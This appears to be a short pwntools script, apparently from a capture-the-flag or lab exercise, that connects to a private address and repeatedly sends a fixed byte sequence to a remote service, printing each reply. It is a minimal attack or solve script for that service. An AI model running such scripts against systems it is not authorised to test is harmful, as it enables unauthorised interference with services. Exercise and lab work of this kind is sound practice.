#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 17 01:28:34 2021

@author: crr0tz
"""

import tty
from pwn import *
ctrl = b'\xc0\x00\x0a\x04\x00\x00\x00\x00\x00\x80\x2f\x40\x3f\xc0'
r = remote('172.18.10.105', 30677)
data = r.recvn(180)
print(data)
r.send(ctrl)
data = r.recv()
print(data)
while 1:
    try:    
        r.send(ctrl)
        data = r.recv()
        print(data)
    
    except:
        break
print('')